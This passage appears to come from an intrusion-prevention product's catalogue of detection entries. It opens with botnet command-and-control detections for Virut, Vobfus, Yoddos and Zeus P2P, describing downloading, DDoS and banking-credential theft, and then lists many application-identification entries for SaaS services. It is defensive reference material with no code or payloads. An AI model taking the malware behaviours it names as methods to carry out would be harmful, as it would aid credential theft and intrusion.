Description: Virut is a malicious botnet coupled with a component that infects executable files on Windows computer (and file shares). In addition, Virut is a malware dropper and has been observed to download several malicious executables, such as spam bots. Furthermore, Virut may download any other arbitrary malicious executable at any time and imposes a high security risk. Virut bots organize in a centralized botnet. Risk analysis: Risk level is high. Attack Host: $([[$LN_DST]]/ipv4) Target Host: $([[$LN_SRC]]/ipv4) Target Port: $([[$LN_SPORT]])
Back to top

Botnet-Vobfus-Traffic-Detected

About this situation: Probable botnet command and control message was detected
Context: Botnet CnC without parameters
Severity: 8
Tags: Botnet
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-569-5211
Vulnerability: Botnet-Vobfus
Description: Vobfus is a malicious botnet. Vobfus is a malware dropper and has been observed to download executables for other kinds of malicious activities, such as click fraud or bitcoin mining. However, Vobfus may download any arbitrary malicious executable at any time and imposes a high security risk. Risk analysis: Risk level is high. Attack Host: $([[$LN_DST]]/ipv4) Target Host: $([[$LN_SRC]]/ipv4) Target Port: $([[$LN_SPORT]])
Back to top

Botnet-Yoddos-Traffic-Detected

About this situation: Probable botnet command and control message was detected
Context: Botnet CnC without parameters
Severity: 8
Tags: Botnet
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1296-5242
Vulnerability: Botnet-Yoddos
Description: Yoddos is a malicious botnet. Yoddos abuses infected computers in that they perform distributed denial-of-service (DDoS) attacks. Yoddos bots connect to a centralized server to obtain instructions for targets of DDoS attacks. During such an attack, Yoddos severely harms the Internet connectivity of both, the DDoS target and the infected computer. Risk analysis: Risk level is high. Attack Host: $([[$LN_DST]]/ipv4) Target Host: $([[$LN_SRC]]/ipv4) Target Port: $([[$LN_SPORT]])
Back to top

Botnet-Zeus_P2P-Traffic-Detected

About this situation: Probable botnet command and control message was detected
Context: Botnet CnC without parameters
Severity: 8
Tags: Botnet
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1296-5242
Vulnerability: Botnet-Zeus_P2P
Description: Zeus P2P is a malicious botnet that is primarily used as banking trojan. Zeus P2P steals login credentials, such as for online banking websites. It uses so called web injects to modify banking websites, for example, to ask the users of infected PCs to enter additional Transaction Authentication Numbers (TANs). As such, users of infected PCs should immediately change their passwords in online services (social networks, web mailers, banks, etc.). Zeus P2P bots organize in a peer-to-peer botnet, which are highly resilient due to the lack of single-point-of-failures. Risk analysis: Risk level is high. Attack Host: $([[$LN_DST]]/ipv4) Target Host: $([[$LN_SRC]]/ipv4) Target Port: $([[$LN_SPORT]])
Back to top

Botnets

About this situation: Sites that host the command-and-control centers for networks of bots that have been installed onto users' computers. (Excludes web crawlers.)
Context: URL Application Context
Severity: 1
Tags: Security, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that host the command-and-control centers for networks of bots that have been installed onto users' computers. (Excludes web crawlers.)
Back to top

Bottomline

About this situation: Application Bottomline detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bottomline is global provider of cloud-based payments and invoice automation software and services for organizations seeking more secure and efficient financial processes.
Back to top

Boulevard-R

About this situation: Application Boulevard-R detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Boulevard R - web-based software, helps financial advisors grow their business with two products
Back to top

Bounce-Exchange

About this situation: Bounce Exchange usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Description: Bounce Exchange is a statistic collection and web analytics service.
Back to top

Box

About this situation: Box usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1372-5242
Description: Box is an online file sharing, storage and document collaboration service.
Back to top

Boxbe

About this situation: Application Boxbe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Boxbe is an integrated email helper enabling Gmail, Yahoo and AOL users to prioritize and reduce email overload.
Back to top

Boxcar

About this situation: Application Boxcar detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Boxcar is Personalized Push and Alerts Inbox for your iPhone that lets you manage and live news in real-time
Back to top

Boxcryptor

About this situation: Application Boxcryptor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Boxcryptor encrypts your files on your computer, your smartphone or your tablet before uploading them to a cloud storage provider of your choice.
Back to top

Boxee

About this situation: Application Boxee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Boxee is a cross-platform freeware HTPC (Home Theater PC) software application with a 10-foot user interface and social networking features designed for the living-room TV that enables its users to view, rate and recommend content to their friends through many social network services and interactive media related features.
Back to top

Boxever

About this situation: Application Boxever detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Boxever provides customer intelligence and predictive marketing solutions to the travel industry. It is a 'big data' platform for airlines. It's a real-time customer intelligence solution that enables airlines to leverage their online, offline and offsite customer data to customer relationships.
Back to top

BPMonline

About this situation: Application BPMonline detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BPMonline - provider of CRM and BPM solutions.Customer relationship, business process management, sales force automation software for your business in any industry.
Back to top

Bradyplc

About this situation: Application Bradyplc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Brady plc
Back to top

Brain-Cert

About this situation: Application Brain-Cert detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Brain Cert - All-In-One Educational Platform.
Back to top

Brainlab

About this situation: Application Brainlab detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Brainlab is a provide a medical device technology with operations across the globe and offices in 17 countries
Back to top

Brainloop

About this situation: Application Brainloop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Brainloop offers SaaS solutions to securely manage and collaborate on confidential documents inside and outside of the enterprise.
Back to top

Brainpop

About this situation: brainpop usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: BrainPOP creates animated, curriculum-based content that supports educators and engages students - in school, at home, and on mobile devices
Back to top

Brainshark

About this situation: Application Brainshark detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Brainshark provides cloud-based sales enablement solutions
Back to top

BrainShop

About this situation: Application BrainShop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: BrainShop is a bilingual conversational artificial intelligence
Back to top

BrainStorm

About this situation: Application BrainStorm detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BrainStorm provides software end-user training services. It offers video, instructor-led, quick start cards, computer-based, on-site, and eLive training services for end users in the organizations.
Back to top

Braintree

About this situation: Application Braintree detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Braintree's payment platform provides all the tools online and mobile businesses need to accept payments.
Back to top

Brand24

About this situation: Application Brand24 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Brand24 provides easy to use, cost-effective internet monitoring to get real-time customer insights and actionable intelligence relevant to their products and brands.
Back to top

BrandLocker

About this situation: Application BrandLocker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Brandlocker enables you to manage your brand assets in an online environment. Easily add structure to your content and make your brand accessible for it's users.
Back to top

BrandMaker

About this situation: Application BrandMaker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BrandMaker is a central, web-based marketing software easily accessible for central and local marketing employees via web browser. BrandMaker consists of a broad range of software modules, covering the complete marketing area.
Back to top

Brands-of-the-World

About this situation: Application Brands-of-the-World detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Brands of the World is the world's library of brand logos in vector format available to download. BotW is also a place for designers to showcase their work.
Back to top

Brandworkz

About this situation: Application Brandworkz detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Brandworkz is a specialist provider of cloud-based brand management software, automates the creation and delivery of marketing materials.
Back to top

Bravurasolutions

About this situation: Application Bravurasolutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bravura Solutions Pty Limited is a provider of software solutions for the wealth management, life insurance and transfer agency industries, underpinned by functionality rich technology that enables modernisation, consolidation and simplification.
Back to top

breatheHR

About this situation: Application breatheHR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: breatheHR is specialist HR software company providing HR software solutions within the HR software
Back to top

Breezy-HR

About this situation: Application Breezy-HR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Breezy HR is end-to-end recruiting software designed to optimize your recruiting process and delight your entire team.
Back to top

Bremy

About this situation: Application Bremy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bremy is a provider of integrated electronic media management and publishing solutions for businesses across a broad spectrum of industries.
Back to top

Brettspielwelt

About this situation: BrettspielWelt usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: BrettspielWelt (often abbreviated BSW) is a large, popular, and entirely free German online gaming site. Its name translates as Boardgame World. It contains online versions of over 70 popular classical and modern board games and card games. Source: Wikipedia
Back to top

BridgeTrack

About this situation: Application BridgeTrack detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BridgeTrack - a digital marketing suite that gives ability to optimize marketing efforts across the full spectrum of digital channels.
Back to top

BridgeWorks

About this situation: Application BridgeWorks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BridgeWorks is a software development company that focuses on providing SQL query, reporting, data mining and dashboarding tools to business users that need information from their line of business application and related databases.
Back to top

Brightbox.co.uk

About this situation: Application Brightbox.co.uk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Brightbox provides Virtual Dedicated Servers optimised for Ruby on Rails hosting.
Back to top

Brightcove

About this situation: Brightcove usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1128-5242
Description: Brightcove is an online video management and distribution service.
Back to top

BrightEdge

About this situation: Application BrightEdge detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BrightEdge is the essential content marketing platform that transforms online content into tangible business results such as traffic, revenue and engagement.
Back to top

Brightgen

About this situation: Application Brightgen detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BrightGen provides the Salesforce expertise and strategic thinking for companies that generate revenue from advertising space. It is customised to fit your business and products, saves your sales team time and allows you to protect and grow advertising revenue - for both print and digital media.
Back to top

Brightidea

About this situation: Application Brightidea detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Brightidea develops and provides cloud-based innovation management software to enable users manage and streamline their innovation processes.
Back to top

BrightLine

About this situation: Application BrightLine detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BrightLine is a provider of attestation and compliance services.
Back to top

BrightMove

About this situation: Application BrightMove detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BrightMove is provider of on-demand staffing and recruiting software for staffing firms, outsourcing providers and corporate HR departments.
Back to top

Brightpearl

About this situation: Brightpearl usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Brightpearl is a SaaS based business software system that integrates a range of different business functions including accounting, CRM, inventory management, ecommerce, projects, helpdesk, POS, purchasing, and sales order management.
Back to top

Brightpod

About this situation: Brightpod usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: Brightpod provides Projects or Pods and task management, editorial calendar , Round Up ,Archive, Work from your mobile device, Attention, contacts, messaging, personal email reminders, reports, user interface customizations, security, and integration with Dropbox or Google Drive.
Back to top

Brightree-LLC

About this situation: Application Brightree-LLC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Brightree is billing and business management software solution for Home Medical Equipment (HME), Durable Medical Equipment (DME), Orthotics and Prosthetics (OP) and Sleep Therapy providers.
Back to top

BrightScope

About this situation: Application BrightScope detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BrightScope is a financial information company that brings transparency to opaque markets.
Back to top

BrightSolid

About this situation: Application BrightSolid detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BrightSolid are cloud and application hosting specialists that own and operate UK-based data centres.
Back to top

Brighttalk

About this situation: BrightTALK usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: BrightTALK provides online events for professionals and their communities.It offers presenters the ability to create powerful online events using our easy-to-use webcast platform. Business and industry professionals create and view webcasts through BrightTALK Channels.
Back to top

Bristol-Online-Surveys

About this situation: Application Bristol-Online-Surveys detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bristol Online Surveys tool designed for Academic Research, Education and Public Sector organisations.
Back to top

British-Standards-Institution

About this situation: Application British-Standards-Institution detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BSI is the business standards company that helps clients worldwide adopt standards of best practice and turn them into habits of excellence.
Back to top

Brivo

About this situation: Application Brivo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Brivo is a SaaS company offering physical access control, video surveillance, and mobile credentials for commercial buildings.
Back to top

Brix

About this situation: Application Brix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BrixHQ is an online agile project management software for small and large enterprises. It helps you to collaborate with your project team across geographically diverse locations. It is easy to set up and use for all your agile project management needs. The gantt chart gives you a graphical representation of your tasks and where they are all at.You can edit tasks directly in the gantt chart just by clicking on them. The gantt chart let's you drag and drop tasks as dates change. Filter the gantt chart by day, week and month to give you the view you need.
Back to top

Broadbean-Technology

About this situation: Application Broadbean-Technology detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Broadbean- is a smart, innovative, global recruitment technology business.
Back to top

Broadsoft

About this situation: Application Broadsoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BroadSoft is the provider of software and services that enable mobile, fixed-line and cable service providers to offer Unified Communications over their Internet Protocol networks.
Back to top

Broadspire

About this situation: Application Broadspire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Broadspire provider risk management solutions designed to help clients achieve their unique goals, increase employee productivity, and reduce costs.
Back to top

Brocade

About this situation: Application Brocade detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Brocade is a provider of networking solutions, Brocade helps organizations to achieve their most critical business objectives.
Back to top

Brokeroffice

About this situation: Application Brokeroffice detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BrokerOffice provides llead management system for health insurance industry.
Back to top

Bronto

About this situation: Application Bronto detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bronto Software provides a cloud-based commerce marketing automation platform to mid-market and enterprise organizations worldwide.
Back to top

Brother-Online

About this situation: Application Brother-Online detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Brother Online is your source for smart, easy-to-implement web-based services that help businesses like yours save money and become more efficient.
Back to top

Browsec

About this situation: Browsec usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-1246-5242
Last changed: sgpkg-ips-1769-5242
Description: Browsec is a VPN service tool for internet privacy and security that allows users to bypass firewalls and protect their identity online.
Back to top

Browsera

About this situation: Application Browsera detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Automated Browser Compatibility Testing Browsera tests and reports cross-browser layout differences and scripting errors on your site.
Back to top

BrowserShots

About this situation: Application BrowserShots detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Browsershots tests website's compatability on different browsers by taking screenshots of your web pages rendered by real browsers on different operating systems.
Back to top

BrowserStack

About this situation: Application BrowserStack detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Browserstack provides browser testing in the cloud. Debug HTML5, JavaScript CSS across browsers. Test in Internet Explorer, Mobile Emulators and Mac OSX.
Back to top

BSNL

About this situation: Application BSNL detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BSNL IDC - service provider for data centre colocation, managed hosting, cloud computing and managed IT services.
Back to top

bswift

About this situation: Application bswift detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bswift offers software and services that streamline benefits, HR and payroll administration for employers and public and private exchanges nationwide. bswift
Back to top

BT-Cloud

About this situation: Application BT-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BT Cloud lets share and organize all your content in a safe and easy way.
Back to top

Bubbleshare

About this situation: BubbleShare usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

Bubbly

About this situation: Bubbly usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: Bubbly is a social messaging service where people share voice updates with friends, family, fans and followers. The service can be accessed at the website https://www.bubbly.net, or through a client application for iPhone or Android.
Back to top

Budget-Your-Trip-Agent

About this situation: Application Budget-Your-Trip-Agent detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Budget Your Trip Agent provides suite of tools for travel agents including Invoicing, Quotes and Estimates, Client Relationship Management, Supplier Reviews, an Itinerary Builder, Travel Cost Research, Task Tracker.
Back to top

Buffer

About this situation: Application Buffer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Buffer allow share any page you're reading. Keep your Buffer topped up and we automagically share posts for you through the day, drive traffic, increase fan engagement and save time on social media.
Back to top

Bufferapp.com

About this situation: bufferapp.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-629-5211
Description: Buffer ia a software application designed to manage social networks, by providing the means for a user to schedule posts to Twitter, Facebook and Linkedin. Source: Wikipedia
Back to top

Bug-Track

About this situation: Application Bug-Track detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Always Unlimited users and projects. Bug-Track.com is a bug tracking software that is affordable, easy to use and customizable. Try it for free today.
Back to top

Bugaware

About this situation: BugAware usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: BugAware has been designed as fully web based software which is available ASP Hosted by us, or as an installed application which you can host yourself. There are no limits to the number of tasks and projects you can create and the complete source code of bug tracking software is made available to installed clients.
Back to top

Bugcrowd

About this situation: Bugcrowd usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Description: Bugcrowd is a bug bounty and vulnerability management service.
Back to top

BugHerd

About this situation: Application BugHerd detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BugHerd is a bug tracker. BugHerd made for web designers and developers to capture client feedback, resolve issues and manage projects
Back to top

Bughost

About this situation: BugHost usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: BugHost has been providing bug tracking solutions to thousands of customers world-wide, in all major industry sectors. Whether your team is big or small, you will be able to find just the right service to meet your team's needs.
Back to top

Bugsnag

About this situation: Application Bugsnag detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bugsnag is a service that automatically detects crashes and errors in real-time from web and mobile applications.
Back to top

Bugtrack

About this situation: BUGtrack usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: BUGtrack has flexible workflow that allows you to be creative by implementing many different strategies. You may customize the way the system progresses issues through their lifecycle.
Back to top

Bugzilla

About this situation: Bugzilla usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-939-5242
Description: Bugzilla is a bug tracking system that allows individual or groups of developers to keep track of outstanding bugs in their product effectively.
Back to top

Build-it-Live

About this situation: Application Build-it-Live detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Build it Live - construction document management and communication tool, that allows construction project participants to collaborate online.
Back to top

BuiltWith

About this situation: Application BuiltWith detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BuiltWith is a website profiling, lead generation, analysis and BI tool providing technology and usage analytics.
Back to top

BulkSMS

About this situation: Application BulkSMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BulkSMS.com is the SMS messaging service provider offering two-way SMS communication services straight from your internet enabled computer.
Back to top

Bullhorn

About this situation: Application Bullhorn detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bullhorn is the recruiting software for recruiters and staffers looking to work smarter, make more placements, and track their metrics to determine ROI.
Back to top

Bullhorn-Reach

About this situation: Application Bullhorn-Reach detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bullhorn Reach is a simple, effective way to leverage your social media connections to find and recruit the best talent
Back to top

Buncee

About this situation: Application Buncee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Buncee is cloud based online creation tool used to create anything from digital stories and multimedia collages, to presentations and happy birthdays.
Back to top

Bungee

About this situation: Application Bungee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Build customer loyalty, drive increased revenue, extend your customer lifecycle, improve brand awareness and gain deeper customer insights with a Bungee Loyalty Program.
Back to top

Bunker-App

About this situation: Application Bunker-App detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bunker App offers a set of tools to help small businesses and freelancers interact with their clients and projects, providing a clear and simple interface that enables you to track the project through to completion, then sent a customized invoice to the customer.
Back to top

Bureau-van-Dijk

About this situation: Application Bureau-van-Dijk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bureau van Dijk is a publisher of business information. Its products are used for research in the following areas
Back to top

Burning-glass

About this situation: Application Burning-glass detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Burning Glass Technologies solutions deliver intuitive insight across a range of functions, including career exploration and workforce and economic development, as well as resume building, skills gap analysis and job matching. Leveraging advanced artificial intelligence, our leading-edge solutions learn from actual career patterns in order to deliver an intuitive, real-time awareness of how and when people change jobs and of the kinds of skills and experiences that lead to successful placement.
Back to top

BurrellesLuce

About this situation: Application BurrellesLuce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BurrellesLuce provides media relations planning, monitoring, and measurement services.
Back to top

Burst-SMS

About this situation: Application Burst-SMS detected
Context: Application Context
Severity: 1
